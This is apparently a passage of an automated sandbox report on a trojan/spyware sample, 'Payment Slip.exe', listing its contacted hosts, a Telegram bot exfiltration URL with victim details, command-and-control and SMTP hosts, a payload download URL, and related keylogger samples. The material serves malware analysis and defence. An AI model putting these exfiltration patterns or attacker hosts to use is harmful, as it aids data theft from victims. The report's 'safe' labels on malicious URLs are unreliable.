https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enlBcq	0%	Avira URL Cloud	safe
https://aka.ms/pscore6lBcq	0%	Avira URL Cloud	safe
https://www.reap.skyestates.com.mt/	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/8	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=	0%	Avira URL Cloud	safe
http://varders.kozow.com:8081	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://smtp.privateemail.com	100%	Avira URL Cloud	malware
http://anotherarmy.dns.army:8081	100%	Avira URL Cloud	malware
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
http://aborters.duckdns.org:8081	100%	Avira URL Cloud	malware
https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin	0%	Avira URL Cloud	safe
https://www.office.com/lBcq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.reap.skyestates.com.mt	108.167.181.251	true	false	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
smtp.privateemail.com	66.29.159.53	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://www.reap.skyestates.com.mt/wp-includes/MGGxuAN14.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enlBcq	Masculinity.exe, 00000007.00000002.3286769966.0000000021019000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lBcq	powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.reap.skyestates.com.mt/	Masculinity.exe, 00000007.00000002.3275528643.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/8	Masculinity.exe, 00000007.00000002.3290205201.000000002374B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Payment Slip.exe, Masculinity.exe.2.dr	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20a	Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	Masculinity.exe, 00000007.00000002.3286769966.000000002101E000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002100F000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.000000002104F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2671509401.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://smtp.privateemail.com	Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aborters.duckdns.org:8081	Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	Masculinity.exe, 00000007.00000002.3286769966.0000000020FDA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020ED8000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2674083664.000000000573A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F1D000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020F45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2671509401.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, Masculinity.exe, 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Masculinity.exe, 00000007.00000002.3288557746.0000000021E81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lBcq	Masculinity.exe, 00000007.00000002.3286769966.000000002104A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	Masculinity.exe, 00000007.00000002.3286769966.0000000020EAE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
108.167.181.251	www.reap.skyestates.com.mt	United States	46606	UNIFIEDLAYER-AS-1US	false
66.29.159.53	smtp.privateemail.com	United States	19538	ADVANTAGECOMUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1481491
Start date and time:	2024-07-25 10:03:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Slip.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/11@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 98% Number of executed functions: 198 Number of non-executed functions: 91
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3372 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Payment Slip.exe

Simulations

Behavior and APIs

Time	Type	Description
04:04:10	API Interceptor	42x Sleep call for process: powershell.exe modified
04:05:22	API Interceptor	12687x Sleep call for process: Masculinity.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Install.msi	Get hash	malicious	Unknown	Browse
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse
	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse
	Updated PI.exe	Get hash	malicious	AgentTesla, RedLine	Browse
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	vlha.shop/LB341/index.php
	http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror	Get hash	malicious	HTMLPhisher	Browse	kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jk8Z5I
	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	tny.wtf/cyd
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/PM6yPStj/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/0DmcWsUI/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
	QUOTATION_JULQTRA071244.PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/PM6yPStj/download
193.122.6.168	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Orden de Compra..exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Fekdjuvq.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	neworder.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ORDER INQUIRY_QTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QvS0a5bvCMM8EUj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.AutoIt.1413.12984.723.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.MSIL.Crypt.25795.12791.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
smtp.privateemail.com	HSBC Payment Advice_pdf.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	Payment List.bat.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	INQUIRY RE44535_pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	66.29.159.53
	Texas_Tool_Purchase_Order#T18834-1.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.29.159.53
	Swift_Message#1234323456.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.29.159.53
	e-dekont_swift-details.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	66.29.159.53
	17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
www.reap.skyestates.com.mt	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	108.167.181.251
	odemePlani.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	#91139_C050.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	BSX#24001602.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
api.telegram.org	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Install.msi	Get hash	malicious	Unknown	Browse	149.154.167.220
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	z23RevisedInvoice.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	149.154.167.220
	Updated PI.exe	Get hash	malicious	AgentTesla, RedLine	Browse	149.154.167.220
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Lisect_AVT_24003_G1B_67.exe	Get hash	malicious	Unknown	Browse	158.101.28.51
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	counter.exe	Get hash	malicious	Bdaejec	Browse	158.101.87.161
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	rRFQ_025261-97382.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
TELEGRAMRU	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_67.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_81.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	CraxsRat VIP.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.97.3
	MGL6070111-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	NB4EASbynx.msi	Get hash	malicious	LummaC	Browse	188.114.96.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Scan file.doc	Get hash	malicious	Unknown	Browse	188.114.96.3
	LisectAVT_2403002C_15.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	LisectAVT_2403002C_16.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	nX1oQE2we8.exe	Get hash	malicious	CryptOne, Qbot	Browse	104.21.34.74

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Lisect_AVT_24003_G1B_127.exe	Get hash	malicious	PureLog Stealer	Browse	188.114.97.3
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rcrypt.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	LisectAVT_2403002C_15.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	LisectAVT_2403002C_16.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	jRlq1fSUW5.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Q2XwE8NRLx.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	Lisect_AVT_24003_G1A_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_84.msi	Get hash	malicious	AteraAgent	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_122.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DD Spotify Acc Gen.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Confirmation transfer AGS # 22-00379.exe	Get hash	malicious	FormBook, GuLoader	Browse	108.167.181.251
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	MB9901717-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	MGL6070111-PDF.exe	Get hash	malicious	Azorult, GuLoader	Browse	108.167.181.251
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	108.167.181.251
	LisectAVT_2403002C_159.exe	Get hash	malicious	Bdaejec, DarkSide	Browse	108.167.181.251
	nX1oQE2we8.exe	Get hash	malicious	CryptOne, Qbot	Browse	108.167.181.251
	LisectAVT_2403002C_160.exe	Get hash	malicious	Upatre	Browse	108.167.181.251
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	108.167.181.251

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
